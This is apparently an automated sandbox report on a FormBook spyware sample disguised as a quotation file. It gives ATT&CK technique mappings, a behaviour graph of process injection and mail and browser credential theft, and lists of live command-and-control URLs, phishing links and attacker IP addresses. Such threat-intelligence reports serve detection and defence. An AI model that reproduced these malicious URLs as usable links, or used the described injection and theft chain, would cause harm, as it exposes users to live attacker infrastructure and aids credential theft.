                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model11
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559208 Sample: RFQ 3100185 MAHAD.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 28 www.soainsaat.xyz 2->28 30 www.amayavp.xyz 2->30 32 11 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 6 other signatures 2->50 10 RFQ 3100185 MAHAD.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 KOXlLfnDPX.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 bitsadmin.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 KOXlLfnDPX.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.amayavp.xyz 185.27.134.144, 49983, 49984, 49985 WILDCARD-ASWildcardUKLimitedGB United Kingdom 22->34 36 www.xcvbj.asia 149.88.81.190, 49974, 49975, 49976 SAIC-ASUS United States 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                RFQ 3100185 MAHAD.exe42%ReversingLabsWin32.Trojan.AutoitInject
                RFQ 3100185 MAHAD.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://server/get.asp0%Avira URL Cloudsafe
                http://www.t91rl7.pro/jhb8/0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/?T0_8iD=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFsHOpOkdYlpV7D2ZUl7tS97QQaenOfLP1h0Bt172p7BcfYdycOAFSb/c&DfkXi=Fj7DJJpHnHupXFB0%Avira URL Cloudsafe
                http://www.soainsaat.xyz/rum2/0%Avira URL Cloudsafe
                http://www.nb-shenshi.buzz/xxr1/?DfkXi=Fj7DJJpHnHupXFB&T0_8iD=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65jhjGZAAT78l+Ifn2gDFJzuFUwvVAtXhX1SyzqClfnAxq+DygikL15ul0%Avira URL Cloudsafe
                http://www.vayui.top/vg0z/0%Avira URL Cloudsafe
                http://www.laohub10.net/sgdd/0%Avira URL Cloudsafe
                http://www.laohub10.net/sgdd/?T0_8iD=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRkS1PAtAoaZepRK9DWNRExJFD195AoHoFNlqSomGJ/HVUmVYGX8lvunC&DfkXi=Fj7DJJpHnHupXFB0%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/?T0_8iD=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqAz7S5AqEHWwbJDh7++v3dj815B2sLXmj/Sv5TVvj9+8mlvYr2YMxw4/T&DfkXi=Fj7DJJpHnHupXFB0%Avira URL Cloudsafe
                http://www.learnwithus.site0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?T0_8iD=oAmOaC9rLcmuYnVpEIiUFnJetHEZs20%Avira URL Cloudsafe
                http://www.rgenerousrs.store/o362/0%Avira URL Cloudsafe
                http://www.learnwithus.site/alu5/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/0%Avira URL Cloudsafe
                http://www.amayavp.xyz/d9ku/?T0_8iD=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J7PmuLndACswz8W5sWEpwPhuKvdySEUjJ8t8ASEzjrGn86fUzHZrSxfB&DfkXi=Fj7DJJpHnHupXFB0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/?DfkXi=Fj7DJJpHnHupXFB&T0_8iD=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2dA9kmJOo/iChJNgRxeiNAYAV69e8LLl8H7JijDWWPyzVI6kJ7OFKWsx0%Avira URL Cloudsafe
                http://www.xcvbj.asia/rq1s/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.learnwithus.site
                209.74.77.107
                truetrue
                  unknown
                  www.vayui.top
                  172.67.145.234
                  truetrue
                    unknown
                    www.amayavp.xyz
                    185.27.134.144
                    truetrue
                      unknown
                      r0lqcud7.nbnnn.xyz
                      27.124.4.246
                      truetrue
                        unknown
                        www.xcvbj.asia
                        149.88.81.190
                        truetrue
                          unknown
                          www.rgenerousrs.store
                          188.114.97.3
                          truetrue
                            unknown
                            www.nb-shenshi.buzz
                            161.97.168.245
                            truetrue
                              unknown
                              natroredirect.natrocdn.com
                              85.159.66.93
                              truefalse
                                high
                                www.t91rl7.pro
                                154.88.22.110
                                truetrue
                                  unknown
                                  www.laohub10.net
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.cuthethoi.online
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.soainsaat.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.rgenerousrs.store/o362/?T0_8iD=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqAz7S5AqEHWwbJDh7++v3dj815B2sLXmj/Sv5TVvj9+8mlvYr2YMxw4/T&DfkXi=Fj7DJJpHnHupXFBtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.soainsaat.xyz/rum2/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.laohub10.net/sgdd/?T0_8iD=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRkS1PAtAoaZepRK9DWNRExJFD195AoHoFNlqSomGJ/HVUmVYGX8lvunC&DfkXi=Fj7DJJpHnHupXFBtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.nb-shenshi.buzz/xxr1/?DfkXi=Fj7DJJpHnHupXFB&T0_8iD=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65jhjGZAAT78l+Ifn2gDFJzuFUwvVAtXhX1SyzqClfnAxq+DygikL15ultrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.laohub10.net/sgdd/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.vayui.top/vg0z/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.vayui.top/vg0z/?T0_8iD=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFsHOpOkdYlpV7D2ZUl7tS97QQaenOfLP1h0Bt172p7BcfYdycOAFSb/c&DfkXi=Fj7DJJpHnHupXFBtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.t91rl7.pro/jhb8/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.rgenerousrs.store/o362/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.learnwithus.site/alu5/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.xcvbj.asia/rq1s/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.amayavp.xyz/d9ku/?T0_8iD=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J7PmuLndACswz8W5sWEpwPhuKvdySEUjJ8t8ASEzjrGn86fUzHZrSxfB&DfkXi=Fj7DJJpHnHupXFBtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.amayavp.xyz/d9ku/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.xcvbj.asia/rq1s/?DfkXi=Fj7DJJpHnHupXFB&T0_8iD=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF2dA9kmJOo/iChJNgRxeiNAYAV69e8LLl8H7JijDWWPyzVI6kJ7OFKWsxtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabbitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icobitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://server/get.aspsvchost.exe, 00000007.00000003.1487758942.0000000003248000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1487651668.000000000321A000.00000004.00000020.00020000.00000000.sdmp, KOXlLfnDPX.exe, 0000000A.00000002.3131667346.00000000008B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.learnwithus.siteKOXlLfnDPX.exe, 0000000C.00000002.3134906846.00000000049F6000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.ecosia.org/newtab/bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ac.ecosia.org/autocomplete?q=bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchbitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=bitsadmin.exe, 0000000B.00000003.1708116997.0000000007928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.amayavp.xyz/d9ku/?T0_8iD=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2bitsadmin.exe, 0000000B.00000002.3135966624.0000000005EE0000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 0000000B.00000002.3134163502.000000000418C000.00000004.10000000.00040000.00000000.sdmp, KOXlLfnDPX.exe, 0000000C.00000002.3133152941.0000000002F9C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.88.81.190
                                                          www.xcvbj.asiaUnited States
                                                          188SAIC-ASUStrue
                                                          154.88.22.110
                                                          www.t91rl7.proSeychelles
                                                          40065CNSERVERSUStrue
                                                          209.74.77.107
                                                          www.learnwithus.siteUnited States
                                                          31744MULTIBAND-NEWHOPEUStrue
                                                          188.114.97.3
                                                          www.rgenerousrs.storeEuropean Union
                                                          13335CLOUDFLARENETUStrue
                                                          185.27.134.144
                                                          www.amayavp.xyzUnited Kingdom
                                                          34119WILDCARD-ASWildcardUKLimitedGBtrue
                                                          27.124.4.246
                                                          r0lqcud7.nbnnn.xyzSingapore
                                                          64050BCPL-SGBGPNETGlobalASNSGtrue
                                                          172.67.145.234
                                                          www.vayui.topUnited States
                                                          13335CLOUDFLARENETUStrue
                                                          85.159.66.93
                                                          natroredirect.natrocdn.comTurkey
                                                          34619CIZGITRfalse
                                                          161.97.168.245
                                                          www.nb-shenshi.buzzUnited States
                                                          51167CONTABODEtrue
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1559208
                                                          Start date and time:2024-11-20 10:15:22 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 51s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:RFQ 3100185 MAHAD.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@7/3@11/9
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 91%
                                                          • Number of executed functions: 53
                                                          • Number of non-executed functions: 292
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • VT rate limit hit for: RFQ 3100185 MAHAD.exe
                                                          No simulations
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          188.114.97.3A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                          • www.beylikduzu616161.xyz/2nga/
                                                          Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                          • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                          ce.vbsGet hashmaliciousUnknownBrowse
                                                          • paste.ee/d/lxvbq
                                                          Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                          • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                          PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                          • www.ssrnoremt-rise.sbs/3jsc/
                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • filetransfer.io/data-package/zWkbOqX7/download
                                                          http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                          • kklk16.bsyo45ksda.top/favicon.ico
                                                          gusetup.exeGet hashmaliciousUnknownBrowse
                                                          • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                          Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                          • gmtagency.online/api/check
                                                          View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                          • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                          185.27.134.144shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                          • www.hasthosting.xyz/04fb/
                                                          SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                          • www.hasthosting.xyz/04fb/
                                                          http://outlook-accede-aqui.iceiy.com/Get hashmaliciousUnknownBrowse
                                                          • outlook-accede-aqui.iceiy.com/jquery.min.js
                                                          85.159.66.93SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.beythome.online/80gy/
                                                          need quotations.exeGet hashmaliciousFormBookBrowse
                                                          • www.soainsaat.xyz/gqm1/
                                                          Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                          • www.magmadokum.com/fo8o/
                                                          Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                          • www.magmadokum.com/fo8o/
                                                          Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                          • www.magmadokum.com/fo8o/
                                                          rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                          • www.magmadokum.com/fo8o/
                                                          DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                          • www.balikesirzeytin.xyz/0l26/
                                                          rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                          • www.emelozel.online/3obl/
                                                          Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                          • www.idaschem.xyz/k45l/
                                                          glued.htaGet hashmaliciousFormBookBrowse
                                                          • www.magmadokum.com/fo8o/
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          r0lqcud7.nbnnn.xyzNew Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          natroredirect.natrocdn.comSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          need quotations.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          www.nb-shenshi.buzzneed quotations.exeGet hashmaliciousFormBookBrowse
                                                          • 161.97.168.245
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          MULTIBAND-NEWHOPEUSA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.77.109
                                                          https://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                          • 209.74.95.101
                                                          Order No 24.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.64.58
                                                          dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.64.187
                                                          RFQ.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.64.58
                                                          DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.64.59
                                                          https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3DGet hashmaliciousHTMLPhisherBrowse
                                                          • 209.74.72.93
                                                          statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.64.58
                                                          rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.64.59
                                                          RFQ.exeGet hashmaliciousFormBookBrowse
                                                          • 209.74.64.58
                                                          CNSERVERSUSNew Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                          • 23.225.159.42
                                                          http://dgzl77sj9.topGet hashmaliciousUnknownBrowse
                                                          • 23.225.172.181
                                                          http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                          • 23.224.201.90
                                                          Hh2x1P87eY.exeGet hashmaliciousUnknownBrowse
                                                          • 154.90.47.77
                                                          IXru5EKmkc.dllGet hashmaliciousUnknownBrowse
                                                          • 154.90.47.77
                                                          Hh2x1P87eY.exeGet hashmaliciousUnknownBrowse
                                                          • 154.90.47.77
                                                          IXru5EKmkc.dllGet hashmaliciousUnknownBrowse
                                                          • 154.90.47.77
                                                          DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                          • 103.135.32.149
                                                          speedtest-cli.arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 41.216.185.178
                                                          http://rbrjflqgjzts.top/loginGet hashmaliciousUnknownBrowse
                                                          • 23.224.184.251
                                                          CLOUDFLARENETUSorder and drawings_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          https://www.google.ca/url?q=30NUMBER&rct=77151727248916238810&sa=t&url=amp/s/estudioit.cl/starl/%23YW5nZWxhLmhvZGdzb25AMnNmZy5jb20=Get hashmaliciousUnknownBrowse
                                                          • 104.26.9.44
                                                          FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 188.114.96.3
                                                          114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                          • 188.114.96.3
                                                          BOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.97.3
                                                          Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          https://2kio0wi0iat.freewebhostmost.comGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.18.11.207
                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                          • 188.114.96.3
                                                          SAIC-ASUSmips.elfGet hashmaliciousMiraiBrowse
                                                          • 149.64.190.242
                                                          x86.elfGet hashmaliciousUnknownBrowse
                                                          • 149.73.164.35
                                                          zgp.elfGet hashmaliciousMiraiBrowse
                                                          • 139.121.236.123
                                                          amen.sh4.elfGet hashmaliciousMiraiBrowse
                                                          • 149.80.195.123
                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 149.64.190.212
                                                          yakuza.x86.elfGet hashmaliciousUnknownBrowse
                                                          • 149.80.141.64
                                                          nullnet_load.spc.elfGet hashmaliciousMiraiBrowse
                                                          • 149.64.30.78
                                                          linux_ppc64.elfGet hashmaliciousChaosBrowse
                                                          • 149.88.76.121
                                                          linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                                          • 149.88.76.121
                                                          linux_386.elfGet hashmaliciousChaosBrowse
                                                          • 149.88.76.121
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\RFQ 3100185 MAHAD.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):289280
                                                          Entropy (8bit):7.995185659865548
                                                          Encrypted:true
                                                          SSDEEP:6144:HQguu/yzuOTGI9vwq5uA0O0RCyoxcKdObV6Rds:Luky5Tkq5V0OZZxZSx
